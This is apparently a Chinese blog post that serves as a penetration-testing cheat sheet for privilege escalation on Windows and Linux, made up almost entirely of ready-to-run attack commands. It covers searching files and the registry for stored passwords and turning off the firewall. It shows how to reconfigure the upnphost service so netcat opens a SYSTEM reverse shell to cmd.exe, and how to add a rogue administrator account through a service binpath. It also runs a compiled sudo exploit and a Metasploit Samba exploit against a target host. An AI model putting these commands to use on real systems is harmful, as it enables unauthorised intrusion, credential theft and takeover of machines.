域渗透(提权篇)

小帅帅 7265 0

渗透(提权篇)

常见信息收集

dir /a-r-d /s /b 检查文件夹可写状态

dir /b/s password.txt 查找密码文件或其它敏感文件

dir /b/s config.*

findstr /si password *.xml *.ini *.txt

findstr /si login *.xml *.ini *.txt

C:\sysprep.inf

C:\sysprep\sysprep.xml

C:\Windows\Panther\Unattend\Unattended.xml

C:\Windows\Panther\Unattended.xml

dir /s *pass* == *cred* == *vnc* == *.config* 搜索system32关键字的文件

findstr /si password *.xml *.ini *.txt 搜索某些特定的文件类型

reg query HKLM /f password /t REG_SZ /s 搜索注册表中包含password

reg query HKCU /f password /t REG_SZ /s

netsh firewall show config 显示 Windows 防火墙配置

netsh firewall show state 显示 Windows 防火墙的当前状态

netsh firewall set opmode disable 关闭防火墙

netsh advfilewall set publicprofile state off

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 获取操作系统信息

systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

schtasks /query /fo LIST /v 计划任务 [国外调整 chcp 437]

route print 查看路由表

arp -A 查看ARP缓存

upnphost提权

sc qc Spooler 查询,配置,和管理Windows服务

accesschk.exe -ucqv Spooler 检查每个服务需要的权限 XP_SP2被修复

攻击手法:

sc qc upnphost

sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e

C:\WINDOWS\System32\cmd.exe"

sc config upnphost obj= ".\LocalSystem" password= ""

sc qc upnphost

net start upnphost

执行netcat并且使用SYSTEM权限反弹一个shell

sc config PFNET binpath= "net user admin P@ssword123! /add"

sc stop PFNET

sc start PFNET

sc config PFNET binpath= "net localgroup Administrators admin /add"

sc stop PFNET

sc start PFNET

服务与权限

DRIVERQUERY 安装驱动

wmic product list brief 查看安装程序和版本信息. [可能存在漏洞]

wmic service list brief 查看服务、进程和启动程序信息

wmic process list brief

wmic startup list brief

wmic qfe get Caption,Description,HotFixID,InstalledOn 查看安装补丁和时间信息

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

wimc process where(description="进程名") 结合tasklist /svc

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v

"C:\Windows\\" |findstr /i /v """ 列出目标机器上所有没有用引号包含的服务路径

tasklist /v /fo list /fi "USERNAME eq NT AUTHORITY\SYSTEM" 筛选NT AUTHORITY\SYSTEM权

限进程

icacls "C:\Program Files (x86)\360" 查看路径中受影响文件夹的权限

补丁对应Exp

补丁对比 https://github.com/GDSSecurity/Windows-Exploit-Suggester

pip install xlrd --upgrade

./windows-exploit-suggester.py --update

[+] writing to file 2014-06-06-mssb.xlsx

输入“systeminfo”输入,并将其指向微软数据库

./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-

systeminfo.txt

未修补漏洞存在的exp

./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows server

2008 r2'

AlwaysInstallElevated提权

http://www.greyhathacker.net/?p=185

如果这个设置被启用,它允许任何权限的用户暂时使用NT AUTHORITY\SYSTEM权限来安装*.msi文

件。

AlwaysInstallElevated且它的DWORD值是1才有效。

https://github.com/SecWiki/windows-kernel-exploits

https://github.com/SecWiki/linux-kernel-exploits

可以利用Advanced Installer(http://www.advancedinstaller.com/)生成msi安装包

查看.msi程序的执行权限

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

查看是否设置有setuid和setgid

reg query

HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits

CVE-2017-1000367

系统必须启用selinux

sudo需要用selinux支持(sudo -r)

用户需要具有sudo权限

gcc -o sudopwn sudopwn.c -lutil

./sudopwn

枚举系统设置和权限的检查

http://www.securitysift.com/download/linuxprivchecker.py

基于操作系统的内核版本号

https://github.com/PenturaLabs/Linux_Exploit_Suggester

./Linux_Exploit_Suggester.pl -k 内核版本号[例如3.10,结合uname -a]

检测权限提升向量的shell脚本

https://github.com/pentestmonkey/unix-privesc-check

unix-privesc-check standard

unix-privesc-check detailed

下载和解压缩脚本RootHelper

https://github.com/NullArray/RootHelper

CVE-2017-7494[Samba]

http://fuping.site/2017/05/25/Samba-Remote-Code-Execution-Vulnerability-Replication/

use exploit/linux/samba/is_known_pipename

set RHOST 192.168.232.137

set target 3

exploit

内核提权

lsb_release -a

uname -a

python -c 'import pty; pty.spawn("/bin/bash")'

suid 提权 [有限制]

find / -perm -u=s -type f 2>/dev/null

from:

https://04z.net/2017/07/10/AD-Attacks-go/

标签: 渗透 提权 web渗透

发表评论 (已有0条评论)

还木有评论哦,快来抢沙发吧~